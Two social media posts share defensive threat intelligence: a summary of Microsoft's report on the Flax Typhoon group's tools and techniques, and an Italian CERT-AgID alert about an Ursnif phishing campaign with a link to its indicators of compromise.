Good day everyone! The Microsoft Threat Intelligence team has discovered activity from a group known as #FlaxTyphoon. They are a nation-state group from China that targeted organizations in Taiwan. While the group leverages tools that are commonly used, like #ChinaChopper, #MetaSploit, and #Mimikatz, they also rely on abusing #LOLBINS, or Living-off-the-land binaries and scripts (tools that exist and come with the native operating system). Some of their TTPs include using registry key modification for persistence, using #powershell, #certutil, or #bitsadmin to download tools, and accessing #LSASS process memory and Security Account Manager registry hive for credential access. This is a great article that not only provides high-level details but it provides a starting point for any organization to start threat hunting by using the technical details provided! Enjoy your weekend and #HappyHunting!

#CyberSecurity #ITSecurity #InfoSec #BlueTeam #ThreatIntel #ThreatHunting #ThreatDetection #readoftheday

RT @AgidCert
Campagna 🇮🇹 #Ursnif a tema #AgenziaEntrate utilizza #bitsadmin

📬 Oggetto: "Commissione di vigilanza sul registro tributario"

⚔️ TTP:

Email > Link > RAR > HTA > bitsadmin > DLL

💣 Disponibili gli #IoC 👇

🔗 https://cert-agid.gov.it/wp-content/uploads/2023/02/ursnif_agenzia-entrate_07-02-2023.json_.txt

Telegram: https://t.me/certagid/432